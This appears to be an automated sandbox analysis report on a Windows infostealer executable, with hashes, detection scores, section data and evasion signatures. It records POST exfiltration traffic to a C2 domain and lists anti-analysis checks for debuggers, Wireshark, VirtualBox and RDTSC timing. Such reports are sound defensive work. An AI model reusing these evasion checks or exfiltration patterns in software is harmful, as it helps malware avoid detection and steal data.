
Windows Analysis Report
1o81tDUu5M.exe

Overview

General Information

Sample name: 1o81tDUu5M.exe (renamed because original name is a hash value)
Original sample name: 3fbe557c7ec8409f30604b0f5e365f70.exe
Analysis ID: 1578916
MD5: 3fbe557c7ec8409f30604b0f5e365f70
SHA1: 00d9f4548c93be387f68c1b7aeedcf4c75873b60
SHA256: f4e7b423983d4606cb9a72876f57c870884b40556ab6ea3da498d69e02acacab
Tags: exe, user-abuse_ch

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Hides threads from debuggers
Infostealer behavior detected
Leaks process information
Machine Learning detection for sample
PE file contains section with special chars
Potentially malicious time measurement code found
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Detected potential crypto function
Entry point lies outside standard sections
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • 1o81tDUu5M.exe (PID: 7600 cmdline: "C:\Users\user\Desktop\1o81tDUu5M.exe" MD5: 3FBE557C7EC8409F30604B0F5E365F70)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

AV Detection

Source: 1o81tDUu5M.exe Avira: detected
Source: 1o81tDUu5M.exe Virustotal: Detection: 57%
Source: 1o81tDUu5M.exe ReversingLabs: Detection: 65%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: 1o81tDUu5M.exe Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\1o81tDUu5M.exe Code function: -----BEGIN PUBLIC KEY----- 0_2_0095DCF0
Source: 1o81tDUu5M.exe Binary or memory string: -----BEGIN PUBLIC KEY-----
Source: 1o81tDUu5M.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: C:\Users\user\Desktop\1o81tDUu5M.exe Code function: 0_2_0093255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_0093255D
Source: C:\Users\user\Desktop\1o81tDUu5M.exe Code function: 0_2_009329FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_009329FF
Source: global traffic HTTP traffic detected: GET /ip HTTP/1.1 Host: httpbin.org Accept: */*
Source: global traffic HTTP traffic detected: POST /WEIsmPfDcpBFJozngnYN1734366322 HTTP/1.1 Host: home.twentytk20pn.top Accept: */* Content-Type: application/json Content-Length: 456478
Source: global traffic HTTP traffic detected: POST /WEIsmPfDcpBFJozngnYN1734366322 HTTP/1.1 Host: home.twentytk20pn.top Accept: */* Content-Type: application/json Content-Length: 143 Data Raw: 7b 20 22 69 64 31 22 3a 20 22 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 5c 2f 68 31 3e 5c 6e 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 5c 6e 3c 5c 2f 62 6f 64 79 3e 3c 5c 2f 68 74 6d 6c 3e 5c 6e 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d Data Ascii: { "id1": "<html><body><h1>503 Service Unavailable<\/h1>\nNo server is available to handle this request.\n<\/body><\/html>\n", "data": "Done1" }
Source: Joe Sandbox View IP Address: 34.226.108.155
Source: Joe Sandbox View IP Address: 147.45.113.159
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\1o81tDUu5M.exe Code function: 0_2_00937770 recv,0_2_00937770
Source: global traffic HTTP traffic detected: GET /ip HTTP/1.1 Host: httpbin.org Accept: */*
Source: global traffic DNS traffic detected: DNS query: httpbin.org
Source: global traffic DNS traffic detected: DNS query: home.twentytk20pn.top
Source: unknown HTTP traffic detected: POST /WEIsmPfDcpBFJozngnYN1734366322 HTTP/1.1 Host: home.twentytk20pn.top Accept: */* Content-Type: application/json Content-Length: 456478
Source: 1o81tDUu5M.exe, 00000000.00000002.1819574715.0000000000DE0000.00000040.00000001.01000000.00000003.sdmp, 1o81tDUu5M.exe, 00000000.00000003.1718517701.0000000006F8F000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://.css
Source: 1o81tDUu5M.exe, 00000000.00000002.1819574715.0000000000DE0000.00000040.00000001.01000000.00000003.sdmp, 1o81tDUu5M.exe, 00000000.00000003.1718517701.0000000006F8F000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://.jpg
Source: 1o81tDUu5M.exe, 1o81tDUu5M.exe, 00000000.00000003.1802788486.00000000016A1000.00000004.00000020.00020000.00000000.sdmp, 1o81tDUu5M.exe, 00000000.00000003.1802595901.0000000001691000.00000004.00000020.00020000.00000000.sdmp, 1o81tDUu5M.exe, 00000000.00000003.1802624909.000000000169E000.00000004.00000020.00020000.00000000.sdmp, 1o81tDUu5M.exe, 00000000.00000003.1802957386.00000000016B0000.00000004.00000020.00020000.00000000.sdmp, 1o81tDUu5M.exe, 00000000.00000002.1820980792.00000000016B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://home.twentytk20pn.top/WE
Source: 1o81tDUu5M.exe, 00000000.00000003.1718517701.0000000006F8F000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnY322
Source: 1o81tDUu5M.exe, 00000000.00000002.1819574715.0000000000DE0000.00000040.00000001.01000000.00000003.sdmp, 1o81tDUu5M.exe, 00000000.00000002.1820625051.000000000160E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322
Source: 1o81tDUu5M.exe, 00000000.00000002.1819574715.0000000000DE0000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322http://home.twentytk20pn.top/WEIsmPfDcpBF
Source: 1o81tDUu5M.exe, 00000000.00000002.1820625051.000000000160E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322se
Source: 1o81tDUu5M.exe, 00000000.00000003.1802788486.00000000016A1000.00000004.00000020.00020000.00000000.sdmp, 1o81tDUu5M.exe, 00000000.00000003.1802595901.0000000001691000.00000004.00000020.00020000.00000000.sdmp, 1o81tDUu5M.exe, 00000000.00000003.1802624909.000000000169E000.00000004.00000020.00020000.00000000.sdmp, 1o81tDUu5M.exe, 00000000.00000003.1802957386.00000000016B0000.00000004.00000020.00020000.00000000.sdmp, 1o81tDUu5M.exe, 00000000.00000002.1820980792.00000000016B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://home.twentytk20pn.top/WEfo
Source: 1o81tDUu5M.exe, 00000000.00000002.1819574715.0000000000DE0000.00000040.00000001.01000000.00000003.sdmp, 1o81tDUu5M.exe, 00000000.00000003.1718517701.0000000006F8F000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://html4/loose.dtd
Source: 1o81tDUu5M.exe, 00000000.00000003.1718517701.0000000006F8F000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://curl.se/docs/alt-svc.html
Source: 1o81tDUu5M.exe String found in binary or memory: https://curl.se/docs/alt-svc.html#
Source: 1o81tDUu5M.exe, 00000000.00000003.1718517701.0000000006F8F000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://curl.se/docs/hsts.html
Source: 1o81tDUu5M.exe String found in binary or memory: https://curl.se/docs/hsts.html#
Source: 1o81tDUu5M.exe, 1o81tDUu5M.exe, 00000000.00000002.1819574715.0000000000DE0000.00000040.00000001.01000000.00000003.sdmp, 1o81tDUu5M.exe, 00000000.00000003.1718517701.0000000006F8F000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: 1o81tDUu5M.exe String found in binary or memory: https://curl.se/docs/http-cookies.html#
Source: 1o81tDUu5M.exe, 00000000.00000002.1819574715.0000000000DE0000.00000040.00000001.01000000.00000003.sdmp, 1o81tDUu5M.exe, 00000000.00000003.1718517701.0000000006F8F000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://httpbin.org/ip
Source: 1o81tDUu5M.exe, 00000000.00000002.1819574715.0000000000DE0000.00000040.00000001.01000000.00000003.sdmp, 1o81tDUu5M.exe, 00000000.00000003.1718517701.0000000006F8F000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://httpbin.org/ipbefore
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443

System Summary

Source: 1o81tDUu5M.exe Static PE information: section name:
Source: 1o81tDUu5M.exe Static PE information: section name: .idata
Source: 1o81tDUu5M.exe Static PE information: section name:
Source: C:\Users\user\Desktop\1o81tDUu5M.exe Code function: 0_3_016A3372 0_3_016A3372
Source: C:\Users\user\Desktop\1o81tDUu5M.exe Code function: 0_3_01697220 0_3_01697220
Source: C:\Users\user\Desktop\1o81tDUu5M.exe Code function: 0_2_009FB180 0_2_009FB180
Source: C:\Users\user\Desktop\1o81tDUu5M.exe Code function: 0_2_009405B0 0_2_009405B0
Source: C:\Users\user\Desktop\1o81tDUu5M.exe Code function: 0_2_00946FA0 0_2_00946FA0
Source: C:\Users\user\Desktop\1o81tDUu5M.exe Code function: 0_2_00A000E0 0_2_00A000E0
Source: C:\Users\user\Desktop\1o81tDUu5M.exe Code function: 0_2_009410E6 0_2_009410E6
Source: C:\Users\user\Desktop\1o81tDUu5M.exe Code function: 0_2_00CBE030 0_2_00CBE030
Source: C:\Users\user\Desktop\1o81tDUu5M.exe Code function: 0_2_00996210 0_2_00996210
Source: C:\Users\user\Desktop\1o81tDUu5M.exe Code function: 0_2_009FC320 0_2_009FC320
Source: C:\Users\user\Desktop\1o81tDUu5M.exe Code function: 0_2_00A00420 0_2_00A00420
Source: C:\Users\user\Desktop\1o81tDUu5M.exe Code function: 0_2_00C9D430 0_2_00C9D430
Source: C:\Users\user\Desktop\1o81tDUu5M.exe Code function: 0_2_00CA35B0 0_2_00CA35B0
Source: C:\Users\user\Desktop\1o81tDUu5M.exe Code function: 0_2_0093E620 0_2_0093E620
Source: C:\Users\user\Desktop\1o81tDUu5M.exe Code function: 0_2_00CB4780 0_2_00CB4780
Source: C:\Users\user\Desktop\1o81tDUu5M.exe Code function: 0_2_00CC1780 0_2_00CC1780
Source: C:\Users\user\Desktop\1o81tDUu5M.exe Code function: 0_2_009FC770 0_2_009FC770
Source: C:\Users\user\Desktop\1o81tDUu5M.exe Code function: 0_2_00C96730 0_2_00C96730
Source: C:\Users\user\Desktop\1o81tDUu5M.exe Code function: 0_2_009E9880 0_2_009E9880
Source: C:\Users\user\Desktop\1o81tDUu5M.exe Code function: 0_2_009EC900 0_2_009EC900
Source: C:\Users\user\Desktop\1o81tDUu5M.exe Code function: 0_2_00944940 0_2_00944940
Source: C:\Users\user\Desktop\1o81tDUu5M.exe Code function: 0_2_00C89920 0_2_00C89920
Source: C:\Users\user\Desktop\1o81tDUu5M.exe Code function: 0_2_0093A960 0_2_0093A960
Source: C:\Users\user\Desktop\1o81tDUu5M.exe Code function: 0_2_00B06AC0 0_2_00B06AC0
Source: C:\Users\user\Desktop\1o81tDUu5M.exe Code function: 0_2_00CB3A70 0_2_00CB3A70
Source: C:\Users\user\Desktop\1o81tDUu5M.exe Code function: 0_2_00CA1BD0 0_2_00CA1BD0
Source: C:\Users\user\Desktop\1o81tDUu5M.exe Code function: 0_2_0093CBB0 0_2_0093CBB0
Source: C:\Users\user\Desktop\1o81tDUu5M.exe Code function: 0_2_00CA8BF0 0_2_00CA8BF0
Source: C:\Users\user\Desktop\1o81tDUu5M.exe Code function: 0_2_00971BE0 0_2_00971BE0
Source: C:\Users\user\Desktop\1o81tDUu5M.exe Code function: 0_2_00C97CC0 0_2_00C97CC0
Source: C:\Users\user\Desktop\1o81tDUu5M.exe Code function: 0_2_00CBCC70 0_2_00CBCC70
Source: C:\Users\user\Desktop\1o81tDUu5M.exe Code function: 0_2_00945DB0 0_2_00945DB0
Source: C:\Users\user\Desktop\1o81tDUu5M.exe Code function: 0_2_00CACD80 0_2_00CACD80
Source: C:\Users\user\Desktop\1o81tDUu5M.exe Code function: 0_2_00CB4D40 0_2_00CB4D40
Source: C:\Users\user\Desktop\1o81tDUu5M.exe Code function: 0_2_00955EB0 0_2_00955EB0
Source: C:\Users\user\Desktop\1o81tDUu5M.exe Code function: 0_2_00943ED0 0_2_00943ED0
Source: C:\Users\user\Desktop\1o81tDUu5M.exe Code function: 0_2_00C4AE30 0_2_00C4AE30
Source: C:\Users\user\Desktop\1o81tDUu5M.exe Code function: 0_2_009FEF90 0_2_009FEF90
Source: C:\Users\user\Desktop\1o81tDUu5M.exe Code function: 0_2_009F8F90 0_2_009F8F90
Source: C:\Users\user\Desktop\1o81tDUu5M.exe Code function: 0_2_00CB9FE0 0_2_00CB9FE0
Source: C:\Users\user\Desktop\1o81tDUu5M.exe Code function: 0_2_00C82F90 0_2_00C82F90
Source: C:\Users\user\Desktop\1o81tDUu5M.exe Code function: 0_2_00954F70 0_2_00954F70
Source: C:\Users\user\Desktop\1o81tDUu5M.exe Code function: String function: 009375A0 appears 528 times
Source: C:\Users\user\Desktop\1o81tDUu5M.exe Code function: String function: 009373F0 appears 86 times
Source: C:\Users\user\Desktop\1o81tDUu5M.exe Code function: String function: 00AE7220 appears 82 times
Source: C:\Users\user\Desktop\1o81tDUu5M.exe Code function: String function: 00974FD0 appears 182 times
Source: C:\Users\user\Desktop\1o81tDUu5M.exe Code function: String function: 00974F40 appears 174 times
Source: C:\Users\user\Desktop\1o81tDUu5M.exe Code function: String function: 009371E0 appears 42 times
Source: C:\Users\user\Desktop\1o81tDUu5M.exe Code function: String function: 00A144A0 appears 72 times
Source: C:\Users\user\Desktop\1o81tDUu5M.exe Code function: String function: 0093CAA0 appears 40 times
Source: C:\Users\user\Desktop\1o81tDUu5M.exe Code function: String function: 0094CD40 appears 40 times
Source: C:\Users\user\Desktop\1o81tDUu5M.exe Code function: String function: 0094CCD0 appears 38 times
Source: C:\Users\user\Desktop\1o81tDUu5M.exe Code function: String function: 009750A0 appears 31 times
Source: C:\Users\user\Desktop\1o81tDUu5M.exe Code function: String function: 00B0CBC0 appears 95 times
Source: 1o81tDUu5M.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: 1o81tDUu5M.exe Static PE information: Section: obbejfdq ZLIB complexity 0.9943257921160943
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@1/0@6/2
Source: C:\Users\user\Desktop\1o81tDUu5M.exe Code function: 0_2_0093255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_0093255D
Source: C:\Users\user\Desktop\1o81tDUu5M.exe Code function: 0_2_009331D7 CreateToolhelp32Snapshot,CloseHandle,0_2_009331D7
Source: C:\Users\user\Desktop\1o81tDUu5M.exe Mutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Users\user\Desktop\1o81tDUu5M.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\1o81tDUu5M.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: 1o81tDUu5M.exe Virustotal: Detection: 57%
Source: 1o81tDUu5M.exe ReversingLabs: Detection: 65%
Source: 1o81tDUu5M.exe String found in binary or memory: Unable to complete request for channel-process-startup
Source: 1o81tDUu5M.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\1o81tDUu5M.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\1o81tDUu5M.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\1o81tDUu5M.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\1o81tDUu5M.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\1o81tDUu5M.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\1o81tDUu5M.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\1o81tDUu5M.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\1o81tDUu5M.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\1o81tDUu5M.exe Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\1o81tDUu5M.exe Section loaded: napinsp.dll
Source: C:\Users\user\Desktop\1o81tDUu5M.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\Desktop\1o81tDUu5M.exe Section loaded: wshbth.dll
Source: C:\Users\user\Desktop\1o81tDUu5M.exe Section loaded: nlaapi.dll
Source: C:\Users\user\Desktop\1o81tDUu5M.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\1o81tDUu5M.exe Section loaded: winrnr.dll
Source: C:\Users\user\Desktop\1o81tDUu5M.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\1o81tDUu5M.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\1o81tDUu5M.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\1o81tDUu5M.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\1o81tDUu5M.exe Section loaded: napinsp.dll
Source: C:\Users\user\Desktop\1o81tDUu5M.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\Desktop\1o81tDUu5M.exe Section loaded: wshbth.dll
Source: C:\Users\user\Desktop\1o81tDUu5M.exe Section loaded: nlaapi.dll
Source: C:\Users\user\Desktop\1o81tDUu5M.exe Section loaded: winrnr.dll
Source: C:\Users\user\Desktop\1o81tDUu5M.exe Section loaded: kernel.appcore.dll
Source: 1o81tDUu5M.exe Static file information: File size 4456448 > 1048576
Source: 1o81tDUu5M.exe Static PE information: Raw size of (unnamed section) is bigger than: 0x100000 < 0x283e00
Source: 1o81tDUu5M.exe Static PE information: Raw size of obbejfdq is bigger than: 0x100000 < 0x1b8600

Data Obfuscation

Source: C:\Users\user\Desktop\1o81tDUu5M.exe Unpacked PE file: 0.2.1o81tDUu5M.exe.930000.0.unpack :EW;.rsrc:W;.idata :W; :EW;obbejfdq:EW;msdghfca:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;obbejfdq:EW;msdghfca:EW;.taggant:EW;
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
Source: 1o81tDUu5M.exe Static PE information: real checksum: 0x4488ec should be: 0x44fd50
Source: 1o81tDUu5M.exe Static PE information: section name:
Source: 1o81tDUu5M.exe Static PE information: section name: .idata
Source: 1o81tDUu5M.exe Static PE information: section name:
Source: 1o81tDUu5M.exe Static PE information: section name: obbejfdq
Source: 1o81tDUu5M.exe Static PE information: section name: msdghfca
Source: 1o81tDUu5M.exe Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\1o81tDUu5M.exe Code function: 0_3_01697A29 push ecx; iretd 0_3_01697A2A
Source: C:\Users\user\Desktop\1o81tDUu5M.exe Code function: 0_3_016AEAE8 push eax; iretd 0_3_016AEB21
Source: C:\Users\user\Desktop\1o81tDUu5M.exe Code function: 0_3_016ACF65 push eax; iretd 0_3_016ACF75
Source: C:\Users\user\Desktop\1o81tDUu5M.exe Code function: 0_3_016A784C push ss; retf 0_3_016A7861
Source: C:\Users\user\Desktop\1o81tDUu5M.exe Code function: 0_3_016ACF50 push 00000001h; iretd 0_3_016ACF5C
Source: C:\Users\user\Desktop\1o81tDUu5M.exe Code function: 0_3_016AEB22 push 00000001h; iretd 0_3_016AEB24
Source: 1o81tDUu5M.exe Static PE information: section name: obbejfdq entropy: 7.954225116292913

Boot Survival

Source: C:\Users\user\Desktop\1o81tDUu5M.exe Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\1o81tDUu5M.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\1o81tDUu5M.exe Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\1o81tDUu5M.exe Window searched: window name: Regmonclass
Source: C:\Users\user\Desktop\1o81tDUu5M.exe Window searched: window name: Filemonclass

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\1o81tDUu5M.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: 1o81tDUu5M.exe, 00000000.00000002.1819574715.0000000000DE0000.00000040.00000001.01000000.00000003.sdmp, 1o81tDUu5M.exe, 00000000.00000003.1718517701.0000000006F8F000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: PROCMON.EXE
Source: 1o81tDUu5M.exe, 00000000.00000002.1819574715.0000000000DE0000.00000040.00000001.01000000.00000003.sdmp, 1o81tDUu5M.exe, 00000000.00000003.1718517701.0000000006F8F000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: X64DBG.EXE
Source: 1o81tDUu5M.exe, 00000000.00000002.1819574715.0000000000DE0000.00000040.00000001.01000000.00000003.sdmp, 1o81tDUu5M.exe, 00000000.00000003.1718517701.0000000006F8F000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: WINDBG.EXE
Source: 1o81tDUu5M.exe, 00000000.00000003.1718517701.0000000006F8F000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: 1o81tDUu5M.exe, 00000000.00000002.1819574715.0000000000DE0000.00000040.00000001.01000000.00000003.sdmp, 1o81tDUu5M.exe, 00000000.00000003.1718517701.0000000006F8F000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: WIRESHARK.EXE
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 10D14E3 second address: 10D14F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FE80149857Dh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 10D14F6 second address: 10D1514 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE80147AC06h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 10D1514 second address: 10D151A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 10D151A second address: 10D153A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE80147AC03h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 10D1AB2 second address: 10D1ACB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007FE801498584h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 10D1ACB second address: 10D1AE1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FE80147ABFBh 0x00000008 jnp 00007FE80147ABF6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 10D3C40 second address: 10D3C45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 10D3C45 second address: 10D3C4A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 10D40F3 second address: 10D40F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 10D40F7 second address: 10D40FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 10D40FD second address: 10D412B instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FE80149857Ch 0x00000008 jno 00007FE801498576h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 xor dword ptr [esp], 7941348Eh 0x00000017 mov edi, dword ptr [ebp+122D2B1Bh] 0x0000001d lea ebx, dword ptr [ebp+12459BADh] 0x00000023 add edi, 5A4A4CC7h 0x00000029 xchg eax, ebx 0x0000002a push edx 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 10D412B second address: 10D413E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jng 00007FE80147ABF6h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 10F3F54 second address: 10F3F5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop esi 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 10F3F5F second address: 10F3F65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 10F3F65 second address: 10F3F69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 10F4236 second address: 10F423C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 10F423C second address: 10F4240 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 10F4529 second address: 10F452E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 10F480A second address: 10F4810 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
